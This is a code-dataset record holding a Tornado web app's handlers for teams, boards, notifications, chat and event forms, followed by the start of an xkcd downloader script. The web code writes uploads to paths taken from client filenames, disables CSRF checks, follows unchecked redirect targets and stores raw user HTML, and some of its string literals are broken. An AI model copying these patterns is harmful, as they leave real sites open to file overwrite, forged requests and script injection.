file:\n\t\t\t\tfile.write(file_avatar['body'])\n\t\t\tuser.avatar = \"../\" + filename\n\t\tdb_sess.commit()\n\t\tself.redirect(self.request.uri)\n\t\treturn\n\n\nclass ErrorGenerator(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tdef get(self):\n\t\tself.write_error(int(self.request.uri.split('/')[-1]))\n\n\nclass TeamsHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tdb_sess = db_session.create_session()\n\t\tteams = sorted(db_sess.query(Team).all(), key=lambda x: len(x.users), reverse=True)\n\n\t\tdef get_cap(id_cap: int):\n\t\t\treturn db_sess.query(User).filter(User.id == id_cap).first()\n\n\t\tawait self.render(\"teams.html\", title=\"Teams\", teams=teams, get_cap=get_cap)\n\n\nclass BoardsHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tdb_sess = db_session.create_session()\n\t\tboards = sorted(db_sess.query(Boards).all(), key=lambda x: len(x.board_users), reverse=True)\n\t\tawait self.render(\"boards.html\", title=\"Boards\", boards=boards, get_admin=get_admin)\n\n\nclass UserTeamsHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tusername = str(self.request.uri).split('/')[-2]\n\t\tdb_sess = db_session.create_session()\n\t\tuser = self.get_user(username, db_sess)\n\t\tif not user:\n\t\t\tself.write_error(404)\n\t\t\treturn\n\t\tif user.username != self.current_user.username:\n\t\t\t# We cannot watch teams other user\n\t\t\tself.write_error(403)\n\t\t\treturn\n\t\tteams_own = db_sess.query(Team).filter(Team.chief == self.current_user.id).all()\n\t\tteams = db_sess.query(Team).all()\n\t\tteams_in = []\n\t\tfor t in teams:\n\t\t\tfor user_ in t.users:\n\t\t\t\tif user_.username == self.current_user.username:\n\t\t\t\t\tteams_in.append(t)\n\n\t\tdef get_cap(id_cap: int):\n\t\t\treturn db_sess.query(User).filter(User.id == id_cap).first()\n\n\t\tawait self.render(\n\t\t\t\"user_teams.html\", title=\"Your teams\", own_teams=teams_own, in_teams=teams_in,\n\t\t\tget_cap=get_cap)\n\n\nclass LegalHandler(BaseHandler, ABC):\n\tasync def get(self):\n\t\tawait self.render(\"about.html\", title=\"About\")\n\n\nclass LegalCookiePolicyHandler(BaseHandler, ABC):\n\tasync def get(self):\n\t\tawait self.render(\"cookies_about.html\", title=\"Cookie Policy\")\n\n\nclass UserBoardsHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tusername = str(self.request.uri).split('/')[-2]\n\t\tdb_sess = db_session.create_session()\n\t\tuser = self.get_user(username, db_sess)\n\t\tif not user:\n\t\t\tself.write_error(404)\n\t\t\treturn\n\t\tif user.username != self.current_user.username:\n\t\t\t# We cannot watch teams other user\n\t\t\tself.write_error(403)\n\t\t\treturn\n\t\tboards_own = db_sess.query(Boards).filter(Boards.admin == self.current_user.id).all()\n\t\tboards = db_sess.query(Boards).all()\n\t\tboards_in = []\n\t\tfor b in boards:\n\t\t\tfor user_ in b.board_users:\n\t\t\t\tif user_.username == self.current_user.username:\n\t\t\t\t\tboards_in.append(b)\n\t\tawait self.render(\n\t\t\t\"user_boards.html\", title=\"Your boards\", own_boards=boards_own, in_boards=boards_in,\n\t\t\tget_admin=get_admin)\n\n\nclass TeamEditHandler(BaseHandler, ABC):\n\tdef get_res_sort(self, db_sess, team: Team):\n\t\tres = db_sess.query(User).filter(User.id != self.current_user.id).all()\n\t\tkeys = []\n\t\tfor user in res:\n\t\t\tif user in team.users:\n\t\t\t\tkeys.insert(0, user)\n\t\t\telse:\n\t\t\t\tkeys.append(user)\n\t\tres_sort = {}\n\t\tfor key in keys:\n\t\t\tif key in team.users:\n\t\t\t\tres_sort[key] = 1\n\t\t\telse:\n\t\t\t\tres_sort[key] = 0\n\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tdb_sess = db_session.create_session()\n\t\tteam = self.get_team(self.request.uri.split('/')[-2], db_sess)\n\t\tif not team:\n\t\t\tself.write_error(404)\n\t\t\treturn\n\t\tif self.current_user.id != team.chief:\n\t\t\tself.write_error(403)\n\t\t\treturn\n\n\t\tawait self.render(\"edit_team.html\", title=team.title, result=self.get_res_sort(db_sess, team), team=team)\n\n\t@tornado.web.authenticated\n\tasync def post(self):\n\t\tdb_sess = db_session.create_session()\n\t\tteam = self.get_team(self.request.uri.split('/')[-2], db_sess)\n\t\ttry:\n\t\t\ts = self.get_body_argument(\"string\")\n\t\texcept Exception:\n\t\t\t# It's team profile!\n\t\t\tf = self.request.files.get(\"f\")\n\t\t\tif f:\n\t\t\t\tfile_avatar = f[0] # We use only 1 file\n\t\t\t\tfilename = f\"static/img/teams/{file_avatar['filename']}\"\n\t\t\t\twith open(filename, mode='wb') as file:\n\t\t\t\t\tfile.write(file_avatar['body'])\n\t\t\t\tteam.avatar = \"../\" + filename\n\t\t\ttry:\n\t\t\t\tis_d = self.get_body_argument(\"DELETE_team\")\n\t\t\texcept Exception:\n\t\t\t\tis_d = None\n\t\t\tif is_d is not None:\n\t\t\t\t# bye :(\n\t\t\t\tdb_sess.delete(team)\n\t\t\t\tdb_sess.commit()\n\t\t\t\tself.redirect(f\"/{self.current_user}/teams\")\n\t\t\t\treturn\n\t\t\tdb_sess.commit()\n\t\t\treturn self.render(\"edit_team.html\", title=team.title, result=self.get_res_sort(db_sess, team), team=team)\n\n\t\tif s:\n\t\t\tres = db_sess.query(User).filter(User.username.like(f\"%{s}%\"), User.id != self.current_user.id).all()\n\t\telse:\n\t\t\tres = db_sess.query(User).filter(User.id != self.current_user.id).all()\n\t\tkeys = []\n\t\tfor user in res:\n\t\t\tif user in team.users:\n\t\t\t\tkeys.insert(0, user)\n\t\t\telse:\n\t\t\t\tkeys.append(user)\n\t\tres_sort = {}\n\t\tfor key in keys:\n\t\t\tif key in team.users:\n\t\t\t\tres_sort[key] = 1\n\t\t\telse:\n\t\t\t\tres_sort[key] = 0\n\t\t# Adding members (from checkboxes values)\n\t\ttry:\n\t\t\t_ = self.get_argument(\"btn2\")\n\t\texcept Exception:\n\t\t\t_ = None\n\t\tif _ is not None:\n\t\t\t# User saves changes\n\t\t\t# In general, the list has not changed, so we can handle it right like this\n\t\t\tfor user in res_sort:\n\t\t\t\ttry:\n\t\t\t\t\t__ = self.get_body_argument(user.username)\n\t\t\t\texcept Exception:\n\t\t\t\t\t__ = None\n\t\t\t\tif __ == \"on\" and user not in team.users:\n\t\t\t\t\tawait append_to_team(user, team)\n\t\t\t\t\tres_sort[user] = 1\n\t\t\t\telif __ is None and user in team.users:\n\t\t\t\t\tteam.users.remove(user)\n\t\t\t\t\tres_sort[user] = 0\n\t\tdb_sess.commit()\n\t\treturn self.render(\"edit_team.html\", title=team.title, result=res_sort, text=s, team=team)\n\n\nclass TeamLeaveHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tdb_sess = db_session.create_session()\n\t\tteam = self.get_team(self.request.uri.split('/')[-2], db_sess)\n\t\tif not team:\n\t\t\tself.write_error(404)\n\t\t\treturn\n\t\tif self.current_user.id == team.chief:\n\t\t\tself.write_error(403)\n\t\t\treturn\n\t\tcurrent_user = self.get_user(self.current_user.username, db_sess)\n\t\tif current_user not in team.users:\n\t\t\tself.write_error(403)\n\t\t\treturn\n\t\tteam.users.remove(current_user)\n\t\tdb_sess.commit()\n\t\tself.redirect(f\"/{current_user.username}/teams\")\n\n\nclass CreateTeamHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tif self.current_user.username != self.request.uri.split('/')[-2]:\n\t\t\tself.write_error(403)\n\t\t\treturn\n\t\tform = TeamRegisterForm(self.request.arguments)\n\t\tawait self.render(\"create_team.html\", title=\"Creating team\", form=form, message_title=None)\n\n\t@tornado.web.authenticated\n\tasync def post(self):\n\t\tform = TeamRegisterForm(self.request.arguments)\n\t\tform.chief.data = self.current_user.id\n\t\tif form.validate():\n\t\t\tdb_sess = db_session.create_session()\n\t\t\tif self.get_team(form.title.data, db_sess):\n\t\t\t\tawait self.render(\n\t\t\t\t\t\"create_team.html\", title=\"Creating team\", form=form,\n\t\t\t\t\tmessage_title=f\"Title {form.title.data} is already taken\")\n\t\t\t\treturn\n\t\t\tteam = Team(\n\t\t\t\tchief=form.chief.data,\n\t\t\t\ttitle=form.title.data\n\t\t\t)\n\t\t\tdb_sess.add(team)\n\t\t\tdb_sess.commit()\n\t\t\tself.redirect(f\"/{self.current_user.username}/teams\")\n\t\tawait self.render(\"create_team.html\", title=\"Creating team\", form=form, message_title=None)\n\n\nclass UserInBoxHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tawait self.render(\"inbox.html\", title=\"Notifications\", notifications=self.current_user.notifications[::-1])\n\n\nclass UserInBoxCheckHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def post(self):\n\t\tdb_sess = db_session.create_session()\n\t\tuser = self.get_user(self.current_user.username, db_sess)\n\t\tfor i in range(len(user.notifications)):\n\t\t\tif self.get_argument(\"ntf\" + str(i), None) is not None:\n\t\t\t\tuser.notifications[i].is_read = True\n\t\tdb_sess.add(user)\n\t\tdb_sess.commit()\n\t\tself.redirect(f\"/{self.current_user.username}/inbox\")\n\n\nclass UserInBoxDeleteHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def post(self):\n\t\tdb_sess = db_session.create_session()\n\t\tuser = self.get_user(self.current_user.username, db_sess)\n\t\ti = 0\n\t\twhile i < len(user.notifications):\n\t\t\tif self.get_argument(\"ntf\" + str(i), None) is not None:\n\t\t\t\tdb_sess.delete(user.notifications[i])\n\t\t\t\tdel user.notifications[i]\n\t\t\t\tdb_sess.add(user)\n\t\t\t\tdb_sess.commit()\n\t\t\t\ti -= 1\n\t\t\ti += 1\n\t\tself.redirect(f\"/{self.current_user.username}/inbox\")\n\n\nclass InviteTeamHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tss = self.request.uri.split('/')[-1].split('_____')\n\t\tif self.current_user.email == confirm_token(ss[0]):\n\t\t\tdb_sess = db_session.create_session()\n\t\t\tuser = self.get_user(self.current_user.username, db_sess)\n\t\t\tteam = self.get_team(ss[1], db_sess)\n\t\t\tif user not in team.users:\n\t\t\t\tif user.id != team.chief:\n\t\t\t\t\t# Add user to team\n\t\t\t\t\tteam.users.append(user)\n\t\t\t\t\tdb_sess.add(team)\n\t\t\t\t\t# Delete notification\n\t\t\t\t\tmsg = db_sess.query(Notification).filter(\n\t\t\t\t\t\tNotification.timestamp == ss[2].replace('%20', ' ')).first()\n\t\t\t\t\tif not msg or (msg not in user.notifications):\n\t\t\t\t\t\tself.write_error(404)\n\t\t\t\t\t\treturn\n\t\t\t\t\tdb_sess.delete(msg)\n\t\t\t\t\tdel user.notifications[user.notifications.index(msg)]\n\t\t\t\t\tdb_sess.add(user)\n\t\t\t\t\t# And... Commit db!\n\t\t\t\t\tdb_sess.commit()\n\t\t\t\t\tawait notify_join_team(db_sess.query(User).filter(User.id == team.chief).first(), team)\n\t\t\t\t\tself.redirect(f\"/{user.username}/inbox\")\n\t\t\t\t\treturn\n\t\tself.write_error(404)\n\n\ndef get_admin(id_a: int):\n\tdb_sess = db_session.create_session()\n\treturn db_sess.query(User).filter(User.id == id_a).first()\n\n\nclass BoardViewHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tdb_sess = db_session.create_session()\n\t\tboard = self.get_board(self.request.uri.split('/')[-2], db_sess)\n\t\tif not board:\n\t\t\tself.write_error(404)\n\t\t\treturn\n\t\tuser = self.get_user(self.current_user.username, db_sess)\n\n\t\tawait self.render(\n\t\t\t\"board_view.html\", title=board.title, board=board, get_admin=get_admin,\n\t\t\tflag=False, u=user, choice=random.choice)\n\n\t@tornado.web.authenticated\n\tasync def post(self):\n\t\tdb_sess = db_session.create_session()\n\t\tboard = self.get_board(self.request.uri.split('/')[-2], db_sess)\n\t\tuser = self.get_user(self.current_user.username, db_sess)\n\t\tawait join_to_board(user, board)\n\n\t\tawait self.render(\n\t\t\t\"board_view.html\", title=board.title, board=board, get_admin=get_admin,\n\t\t\tflag=True, u=user, choice=random.choice)\n\n\nclass InviteBoardHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tss = self.request.uri.split('/')[-1].split('_____')\n\t\tif self.current_user.email == confirm_token(ss[0]):\n\t\t\tdb_sess = db_session.create_session()\n\t\t\tuser = self.get_user(self.current_user.username, db_sess)\n\t\t\tuser_asked = self.get_user(ss[3], db_sess)\n\t\t\tboard = self.get_board(ss[1], db_sess)\n\t\t\tif user_asked not in board.board_users:\n\t\t\t\t# Add user to team\n\t\t\t\tboard.board_users.append(user_asked)\n\t\t\t\tdb_sess.add(board)\n\t\t\t\t# Delete notification\n\t\t\t\tmsg = db_sess.query(Notification).filter(\n\t\t\t\t\tNotification.timestamp == ss[2].replace('%20', ' ')).first()\n\t\t\t\tif not msg or (msg not in user.notifications):\n\t\t\t\t\tself.write_error(404)\n\t\t\t\t\treturn\n\t\t\t\tdb_sess.delete(msg)\n\t\t\t\tdel user.notifications[user.notifications.index(msg)]\n\t\t\t\tdb_sess.add(user)\n\t\t\t\t# And... Commit db!\n\t\t\t\tdb_sess.commit()\n\t\t\t\tawait notify_join_board(user_asked, board)\n\t\t\t\tself.redirect(f\"/{user.username}/inbox\")\n\t\t\t\treturn\n\t\tself.write_error(404)\n\n\nclass CreateBoardHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tif self.current_user.username != self.request.uri.split('/')[-2]:\n\t\t\tself.write_error(403)\n\t\t\treturn\n\t\tform = FormBoardsCreate(self.request.arguments)\n\t\tawait self.render(\"create_board.html\", title=\"Creating board\", form=form, message_title=None)\n\n\t@tornado.web.authenticated\n\tasync def post(self):\n\t\tform = FormBoardsCreate(self.request.arguments)\n\t\tform.admin.data = self.current_user.id\n\t\tif form.validate():\n\t\t\tdb_sess = db_session.create_session()\n\t\t\tif self.get_board(form.title.data, db_sess):\n\t\t\t\tawait self.render(\n\t\t\t\t\t\"create_board.html\", title=\"Creating board\", form=form,\n\t\t\t\t\tmessage_title=f\"Title {form.title.data} is already taken\")\n\t\t\t\treturn\n\t\t\tboard = Boards(\n\t\t\t\ttitle=form.title.data,\n\t\t\t\tabout_board=form.about_board.data,\n\t\t\t\tadmin=form.admin.data, )\n\t\t\tdb_sess.add(board)\n\t\t\tdb_sess.commit()\n\t\t\tself.redirect(f\"/{self.current_user.username}/boards\")\n\t\tawait self.render(\"create_board.html\", title=\"Creating board\", form=form, message_title=None)\n\n\nclass BoardEditHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tdb_sess = db_session.create_session()\n\t\tboard = self.get_board(self.request.uri.split('/')[-2], db_sess)\n\t\tif not board:\n\t\t\tself.write_error(404)\n\t\t\treturn\n\t\tif self.current_user.id != board.admin:\n\t\t\tself.write_error(403)\n\t\t\treturn\n\t\tthreads = db_sess.query(Threads).all()\n\t\tdict_ts = await self.get_dict_t(threads, board)\n\n\t\tawait self.render(\"edit_board.html\", title=board.title, board=board, get_admin=get_admin, dict_threads=dict_ts)\n\n\t@tornado.web.authenticated\n\tasync def post(self):\n\t\tdb_sess = db_session.create_session()\n\t\tboard = self.get_board(self.request.uri.split('/')[-2], db_sess)\n\t\tthreads = db_sess.query(Threads).all()\n\n\t\tfor thread in threads:\n\t\t\tif self.get_argument(f\"btn-check-{thread.id}\", None) is None:\n\t\t\t\tif thread in board.board_threads:\n\t\t\t\t\t# Delete thread\n\t\t\t\t\tdel board.board_threads[board.board_threads.index(thread)]\n\t\t\t\t\tdb_sess.add(board)\n\t\t\telse:\n\t\t\t\tif thread not in board.board_threads:\n\t\t\t\t\t# Add thread\n\t\t\t\t\tboard.board_threads.append(thread)\n\t\t\t\t\tdb_sess.add(board)\n\n\t\tfor user in board.board_users:\n\t\t\tif self.get_argument(f\"check-box-{user.username}\", None) is None:\n\t\t\t\t# Delete user...\n\t\t\t\tdel board.board_users[board.board_users.index(user)]\n\t\t\t\tdb_sess.add(board)\n\n\t\tif self.get_argument(\"about_board\", None) is not None:\n\t\t\t# Change board status\n\t\t\tboard.about_board = self.get_argument(\"about_board\", None)\n\t\t\tdb_sess.add(board)\n\n\t\tdb_sess.commit()\n\t\tdict_ts = await self.get_dict_t(threads, board)\n\n\t\tawait self.render(\"edit_board.html\", title=board.title, board=board, get_admin=get_admin, dict_threads=dict_ts)\n\n\nclass BoardDeleteHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tdb_sess = db_session.create_session()\n\t\tboard = self.get_board(self.request.uri.split('/')[-2], db_sess)\n\t\tif board and (self.current_user.id == board.admin):\n\t\t\t# Delete board (\n\t\t\tdb_sess.delete(board)\n\t\t\tdb_sess.commit()\n\t\t\tself.redirect(f\"/{self.current_user.username}/boards\")\n\t\t\treturn\n\t\tself.write_error(404)\n\n\nclass BoardLeaveHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tdb_sess = db_session.create_session()\n\t\tboard = self.get_board(self.request.uri.split('/')[-2], db_sess)\n\t\tcurrent_user = self.get_user(self.current_user.username, db_sess)\n\t\tif board and current_user and (current_user in board.board_users):\n\t\t\tdel board.board_users[board.board_users.index(current_user)]\n\t\t\tdb_sess.add(board)\n\t\t\tdb_sess.commit()\n\t\t\tself.redirect(f\"/{self.current_user.username}/boards\")\n\t\t\treturn\n\t\tself.write_error(404)\n\n\nclass BoardFloodHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tdb_sess = db_session.create_session()\n\t\tboard = self.get_board(self.request.uri.split('/')[-2], db_sess)\n\t\tif not board:\n\t\t\tself.write_error(404)\n\t\tcurrent_user = self.get_user(self.current_user.username, db_sess)\n\t\tmsg_buffer_json = []\n\t\tfor m in board.messages_buffer:\n\t\t\tmsg_buffer_json.append(json.loads(json.dumps(m, cls=AlchemyEncoder)))\n\t\tif current_user in board.board_users or current_user.id == board.admin:\n\t\t\tawait self.render(\"flood.html\", messages=msg_buffer_json, title=f\"{board.title} flood\", b=board)\n\t\t\treturn\n\t\tself.write_error(404)\n\n\nclass MessageNewHandler(BaseHandler, ABC):\n\t\"\"\"Post a new message to the chat room.\"\"\"\n\n\t@staticmethod\n\tdef append_message(board: Boards, message: Message, db_s):\n\t\tboard.messages_buffer.append(message)\n\t\tif len(board.messages_buffer) > CACHE_SIZE:\n\t\t\tmsg_delete = db_s.query(Message).filter(Message.id == board.messages_buffer[0].id).first()\n\t\t\tdel board.messages_buffer[0]\n\t\t\tdb_s.delete(msg_delete)\n\n\t@tornado.web.authenticated\n\tdef post(self):\n\t\tdb_sess = db_session.create_session()\n\t\tmessage = Message(sender_id=self.current_user.id, body=str(self.get_argument(\"body\"))[:200])\n\t\t# render_string() returns a byte string, which is not supported\n\t\t# in json, so we must convert it to a character string.\n\t\tmessage.html = tornado.escape.to_unicode(self.render_string(\n\t\t\t\"message.html\", message=json.loads(json.dumps(message, cls=AlchemyEncoder))))\n\t\tboard = self.get_board(self.request.uri.split('/')[-3], db_sess)\n\t\tif not board:\n\t\t\tself.write_error(403)\n\t\t\treturn\n\t\tif self.get_argument(\"next\", None):\n\t\t\tself.redirect(self.get_argument(\"next\"))\n\t\telse:\n\t\t\tpass\n\t\tdb_sess.add(message)\n\t\tself.append_message(board, message, db_sess)\n\t\tdb_sess.commit()\n\n\nclass AjaxHandler(tornado.web.RequestHandler, ABC):\n\t\"\"\"Simple, ajax handler\"\"\"\n\n\tdef get(self, *args, **kwargs):\n\t\t\"\"\"Get unlikely to be used for ajax\"\"\"\n\t\tself.write_error(403) # Not allowed!\n\t\tself.finish()\n\n\tdef post(self, *args):\n\t\t\"\"\"Example handle ajax post\"\"\"\n\t\t# useful code goes here\n\t\tself.write(json.dumps({'status': 'ok', 'sent': tornado.escape.json_decode(self.request.body)}))\n\t\tself.finish()\n\n\nclass UserEventCreateHandler(BaseHandler, ABC):\n\tdef check_xsrf_cookie(self):\n\t\tpass\n\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tdb_sess = db_session.create_session()\n\t\tboard = self.get_board(self.request.uri.split('/')[-3], db_sess)\n\t\tif board:\n\t\t\tawait self.render(\n\t\t\t\t\"create_event.html\", title=\"Creation a new user event\", board=board, url=self.request.uri)\n\n\tdef upload_file(self):\n\t\tf = self.request.files['file'][-1]\n\t\twith open(f\"static/img/forms_uploads/{f['filename']}\", mode='wb') as file:\n\t\t\tfile.write(f['body'])\n\n\t@tornado.web.authenticated\n\tasync def post(self):\n\t\tif self.request.body_arguments and self.request.body:\n\t\t\tdb_sess = db_session.create_session()\n\t\t\tboard = self.get_board(self.request.uri.split('/')[-3], db_sess)\n\t\t\tnew_event = UserEvents(board=board.id)\n\t\t\tnew_event.html = ''.join(\n\t\t\t\t[self.request.body_arguments[key][0].decode() for key in self.request.body_arguments])\n\t\t\tnew_event.title = new_event.html.split(\n\t\t\t\t'
')[1].split('
')[0]\n\t\t\tnew_event.about = new_event.html.split(\n\t\t\t\t'
')[1].split('
')[0]\n\t\t\tdb_sess.add(new_event)\n\t\t\tdb_sess.commit()\n\t\telse:\n\t\t\tself.upload_file()\n\n\nclass TeamEventCreateHandler(BaseHandler, ABC):\n\tdef check_xsrf_cookie(self):\n\t\tpass\n\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tdb_sess = db_session.create_session()\n\t\tboard = self.get_board(self.request.uri.split('/')[-3], db_sess)\n\t\tif board:\n\t\t\tawait self.render(\n\t\t\t\t\"create_event.html\", title=\"Creation a new team event\", board=board, url=self.request.uri)\n\n\tdef upload_file(self):\n\t\tf = self.request.files['file'][-1]\n\t\twith open(f\"static/img/forms_uploads/{f['filename']}\", mode='wb') as file:\n\t\t\tfile.write(f['body'])\n\n\t@tornado.web.authenticated\n\tasync def post(self):\n\t\tif self.request.body_arguments and self.request.body:\n\t\t\tdb_sess = db_session.create_session()\n\t\t\tboard = self.get_board(self.request.uri.split('/')[-3], db_sess)\n\t\t\tnew_event = TeamEvents(board=board.id)\n\t\t\tnew_event.html = ''.join(\n\t\t\t\t[self.request.body_arguments[key][0].decode() for key in self.request.body_arguments])\n\t\t\tnew_event.title = new_event.html.split(\n\t\t\t\t'
')[1].split('
')[0]\n\t\t\tnew_event.about = new_event.html.split(\n\t\t\t\t'
')[1].split('
')[0]\n\t\t\tdb_sess.add(new_event)\n\t\t\tdb_sess.commit()\n\t\telse:\n\t\t\tself.upload_file()\n\n\nclass UserEventHandler(BaseHandler, ABC):\n\tdef check_xsrf_cookie(self):\n\t\tpass\n\n\tasync def get(self):\n\t\tdb_sess = db_session.create_session()\n\t\te = self.get_user_event(self.request.uri.split('/')[-1], db_sess)\n\t\tcurrent_user = self.get_user(self.current_user.username, db_sess)\n\t\tif current_user in e.users:\n\t\t\tself.write(\"You already got your answer.\")\n\t\t\treturn\n\t\tawait self.render(\"event.html\", title=e.title[:25].replace(' ', ' '), event=e, url=self.request.uri)\n\n\tasync def post(self):\n\t\tdb_sess = db_session.create_session()\n\t\tevent = self.get_user_event(self.request.uri.split('/')[-1], db_sess)\n\t\tif not event:\n\t\t\treturn\n\t\tcurrent_user = self.get_user(self.current_user.username, db_sess)\n\t\tres = [self.request.body_arguments[key][0].decode() for key in self.request.body_arguments]\n\t\tres_dict = {}\n\t\ti = 0\n\t\twhile i < len(res) - 1:\n\t\t\tres_dict[res[i]] = res[i + 1]\n\t\t\ti += 2\n\t\tif current_user not in event.users:\n\t\t\t# User's answers are ready, now post!\n\t\t\tevent.users.append(current_user)\n\t\t\tdb_sess.add(event)\n\t\t\tdb_sess.commit()\n\t\t\twith open('auto/answers.json', mode='r', encoding='utf-8') as f:\n\t\t\t\tdata = json.load(f)\n\t\t\tif str(event.id) in data[\"user_answers\"]:\n\t\t\t\tdata['user_answers'][str(event.id)].append({current_user.username: res_dict})\n\t\t\telse:\n\t\t\t\tdata['user_answers'][event.id] = [{current_user.username: res_dict}]\n\t\t\twith open('auto/answers.json', mode='w', encoding='utf-8') as file:\n\t\t\t\tjson.dump(data, file)\n\t\telse:\n\t\t\tself.write(\"You already got your answer.\")\n\n\nclass TeamEventHandler(BaseHandler, ABC):\n\tdef check_xsrf_cookie(self):\n\t\tpass\n\n\tasync def get(self):\n\t\tdb_sess = db_session.create_session()\n\t\te = self.get_team_event(self.request.uri.split('/')[-1], db_sess)\n\t\tawait self.render(\"event.html\", title=e.title[:25], event=e, url=self.request.uri)\n\n\tasync def post(self):\n\t\tpass\n\n\nclass UserEventAnswersView(BaseHandler, ABC):\n\tasync def get(self):\n\t\tdb_sess = db_session.create_session()\n\t\tevent = self.get_user_event(self.request.uri.split('/')[-1], db_sess)\n\t\tboard = None\n\t\tres = []\n\t\tfor b in db_sess.query(Boards).all():\n\t\t\tif event in b.user_events:\n\t\t\t\tboard = b\n\t\tif not board:\n\t\t\tself.write_error(403)\n\t\tif board.admin != self.current_user.id:\n\t\t\tself.write_error(403)\n\t\twith open('auto/answers.json', mode='r', encoding='utf-8') as f:\n\t\t\tdata = json.load(f)\n\t\ttry:\n\t\t\tres = data[\"user_answers\"][str(event.id)]\n\t\texcept Exception:\n\t\t\tif str(event.id) not in data[\"user_answers\"]:\n\t\t\t\tres = []\n\t\t\telse:\n\t\t\t\t# Oops! We don't exist!\n\t\t\t\tself.write_error(404)\n\t\tawait self.render(\n\t\t\t\"forms_answers_view.html\", answers=res,\n\t\t\ttitle=\"Check \" + event.title[:20], event=event)\n\n\nclass TeamEventAnswersView(BaseHandler, ABC):\n\tasync def get(self):\n\t\tpass\n\n\nclass UserEventEditHandler(BaseHandler, ABC):\n\tdef check_xsrf_cookie(self) -> None:\n\t\tpass\n\n\tasync def get(self):\n\t\tdb_sess = db_session.create_session()\n\t\tevent = self.get_user_event(self.request.uri.split('/')[-1], db_sess)\n\t\tif not event:\n\t\t\treturn\n\t\tawait self.render(\n\t\t\t\"edit_user_event.html\", event=event, title=\"Edit \" + event.title[:20], url=self.request.uri)\n\n\t@tornado.web.authenticated\n\tasync def post(self):\n\t\tif self.request.body_arguments and self.request.body:\n\t\t\tdb_sess = db_session.create_session()\n\t\t\tid_ = self.request.uri.split('/')[-1]\n\t\t\tboard = self.get_board(self.request.uri.split('/')[-4], db_sess)\n\t\t\tevent = self.get_user_event(id_, db_sess)\n\t\t\tevent.html = ''.join(\n\t\t\t\t[self.request.body_arguments[key][0].decode() for key in self.request.body_arguments])\n\t\t\tevent.html = event.html.replace(\n\t\t\t\tf'''''', '')\n\t\t\tevent.about = event.html.split(\n\t\t\t\t'
')[1].split('
')[0]\n\t\t\tif event.users:\n\t\t\t\tfor i in event.users:\n\t\t\t\t\tdel event.users[event.users.index(i)]\n\t\t\t\t# delete user's answers from db and json files\n\t\t\t\twith open('auto/answers.json', mode='r', encoding='utf-8') as f:\n\t\t\t\t\tdata = json.load(f)\n\t\t\t\tdata['user_answers'][id_] = []\n\t\t\t\twith open('auto/answers.json', mode='w', encoding='utf-8') as file:\n\t\t\t\t\tjson.dump(data, file)\n\t\t\tdb_sess.add(event)\n\t\t\tdb_sess.commit()\n\n\nclass TeamEventEditHandler(BaseHandler, ABC):\n\tasync def get(self):\n\t\tpass\n\n\nclass ChessHandler(BaseHandler, ABC):\n\tasync def get(self):\n\t\tawait self.render(\"CHESS.html\", title=\"Chess\")\n\n\nclass RunnerHandler(BaseHandler, ABC):\n\tasync def get(self):\n\t\tawait self.render(\"RUNNER.html\", title=\"Runner\")\n\n\nclass ScrollingHandler(BaseHandler, ABC):\n\tasync def get(self):\n\t\tawait self.render(\"SCROLLING.html\", title=\"Scrolling\")\n\n\ndef main():\n\tdb_session.global_init(\"db/Babylonia.db\")\n\tapp = Application()\n\tapp.listen(options.port)\n\ttornado.ioloop.IOLoop.current().start()\n\n\n# class MessageBuffer(object):\n# \tdef __init__(self):\n# \t\tself.cache = []\n# \t\tself.cache_size = 300\n#\n# \tdef get_messages_since(self, cursor):\n# \t\t# IMPORTANT: ``cursor`` should be the ``id`` of the last message received.\n# \t\tresults = []\n# \t\tfor msg in reversed(self.cache):\n# \t\t\tif msg[\"id\"] == cursor:\n# \t\t\t\tbreak\n# \t\t\tresults.append(msg)\n# \t\tresults.reverse()\n# \t\treturn results\n#\n# \tdef add_message(self, message):\n# \t\tself.cache.append(message)\n# \t\tif len(self.cache) > self.cache_size:\n# \t\t\tself.cache = self.cache[-self.cache_size:]\n\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":40262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"141811221","text":"import json\nimport requests\n# from settings import get_path\nimport os\nimport json\n\nclass database:\n\n def __init__(self):\n # path = os.path.dirname(os.path.realpath(__file__))\n os.makedirs('%s/Data'%os.path.dirname(os.path.realpath(__file__)), exist_ok=True)\n os.makedirs('%s/Images'%os.path.dirname(os.path.realpath(__file__)), exist_ok=True)\n\n\n def get_latest():\n # download newest json into a response object\n try:\n res_obj = requests.get('https://xkcd.com/info.0.json') # this url always contains json for latest comic\n res_obj.close()\n except requests.exceptions.ConnectionError:\n while True:\n print('Latest comic not found.')\n current = input('Type in a number manually:\\n')\n if current.isdecimal() and int(current) > 0:\n break\n\n # extract comic number from json object\n try:\n get_json = res_obj.json() # convert json to python dict\n current = get_json['num']\n\n # if extraction failed, type in a comic number manually\n except json.decoder.JSONDecodeError:\n while True:\n print('Latest comic not found.')\n 